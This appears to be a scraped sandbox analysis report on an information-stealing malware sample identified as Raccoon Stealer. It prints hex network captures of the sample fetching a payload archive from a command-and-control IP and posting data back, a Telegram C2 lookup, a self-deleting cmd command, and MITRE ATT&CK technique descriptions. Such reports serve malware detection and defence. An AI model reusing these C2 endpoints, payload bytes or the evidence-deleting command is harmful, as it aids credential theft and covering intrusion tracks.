00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 bc 08 00 00 00 60 0c 00 00 0a 00 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 69 02 00 00 00 70 0c 00 00 04 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 d3 1c 00 00 00 80 0c 00 00 1e 00 00 00 ee 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 90 02 00 00 00 a0 0c 00 00 04 00 00 00 0c 0c 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt\!Zpa H 03.textXXZ`P`.datap`@`.rdata \|@`@.bss(`.edata "@0@.idataH@0.CRT,@0.tls @0.rsrc @0.reloc304@0B/4p@@B/19@B/31 @B/45@@B/57`@0B/70ip@B/81@B/92
Sep 27, 2021 23:55:27.794083118 CEST	1886	OUT	GET //l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.138.164.150
Sep 27, 2021 23:55:28.035495043 CEST	1887	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 21:55:28 GMT Content-Type: application/octet-stream Content-Length: 2828315 Connection: keep-alive Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT ETag: "612fa893-2b281b" Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8 b5 4e a5 3e 11 54 3f 57 4d ea 16 11 b1 29 39 42 d6 86 ce a3 f6 8e bf 00 9e ec 07 96 d8 0f 1c 6d 56 57 b4 9a 9b 8b bb ed 07 62 80 36 7b e5 11 7c 21 da 0f bc 08 ef d4 4f ec 07 12 01 4d 1a 89 8a e5 3e d6 3e c3 24 5c 2e 25 d4 d7 4c d2 88 7a 46 93 6c d0 a5 f6 03 33 9a 95 9d 01 b3 7c 08 b0 30 23 2a 4e 2b ee b7 1f 38 c4 9b e7 35 db 0f c0 ef 4e af e8 8a 55 34 2b 62 80 15 66 53 ff 03 32 3a 63 f6 8e 1f 03 7a e5 b6 04 c0 31 43 a9 1f 92 b6 da 0f 40 41 cd 9d 5a f8 26 b5 d6 a1 f6 95 77 6f 13 d5 d7 e2 16 fb 81 c3 00 52 40 04 Data Ascii: PKznN<{rinssdbm3.dll\|8NY6$J$1D a.jLVCN;}/$Z,TRqcEc=;{sp`A?MW!a?N~eAWo[},;+\Jw\|k<yR^Eonxsc=V,FcuwO[u{<w7P{K~Ewcz^[Z6GV2+n41M.w{fnJL{ dM+ /)$X!LK`MwILA8rIXr87}<]rTWmb6/_aWlB3n_joMz_Q8KgrLH.v6[4I{1g<>M$G&Y-O9\,tWmX Y3S<#}">0RBg,lh.sorp8)3Kvdsn3+]+krMu_Y\/8T&BC"u;ek u$~`{!M\WY37+nQZ3\G5dZhVLZ\|k5XFYlVVWC\|b\Zm 0PF8{]UpRW,nMMs_@>Q N>T?WM)9BmVWb6{\|!OM>>$\.%LzFl3\|0#N+85NU4+bfS2:cz1C@AZ&woR@
Sep 27, 2021 23:55:35.209006071 CEST	4813	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV Content-Length: 1405 Host: 185.138.164.150
Sep 27, 2021 23:55:35.517987013 CEST	4815	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 21:55:35 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Access-Control-Allow-Origin: * Data Raw: 32 38 0d 0a 31 39 31 36 30 39 39 38 66 65 62 34 32 34 66 63 35 34 37 61 64 31 32 32 38 65 39 65 61 66 65 64 64 37 33 35 36 38 30 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 2819160998feb424fc547ad1228e9eafedd73568000

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49744	149.154.167.99	443	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Timestamp	Direction	Data
2021-09-27 21:55:24 UTC	OUT	GET /agrybirdsgamerept HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Host: t.me
2021-09-27 21:55:24 UTC	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 27 Sep 2021 21:55:24 GMT Content-Type: text/html; charset=utf-8 Content-Length: 4597 Connection: close Set-Cookie: stel_ssid=34c35c3dbe11bf5567_13933969989189526928; expires=Tue, 28 Sep 2021 21:55:24 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=35768000
2021-09-27 21:55:24 UTC	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 22 3e 0a 3c 6d 65 74 61 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @agrybirdsgamerept</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="agrybirdsgamerept"><meta

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124 Parent PID: 5740

General

Start time:	23:55:18
Start date:	27/09/2021
Path:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'
Imagebase:	0x400000
File size:	448000 bytes
MD5 hash:	E283621CD5DEA00D95791A88EECDA925
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: cmd.exe PID: 6212 Parent PID: 7124

General

Start time:	23:55:36
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 5652 Parent PID: 6212

General

Start time:	23:55:36
Start date:	27/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: timeout.exe PID: 5864 Parent PID: 6212

General

Start time:	23:55:36
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /T 10 /NOBREAK
Imagebase:	0x10e0000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.14529.6378

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Raccoon Stealer

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre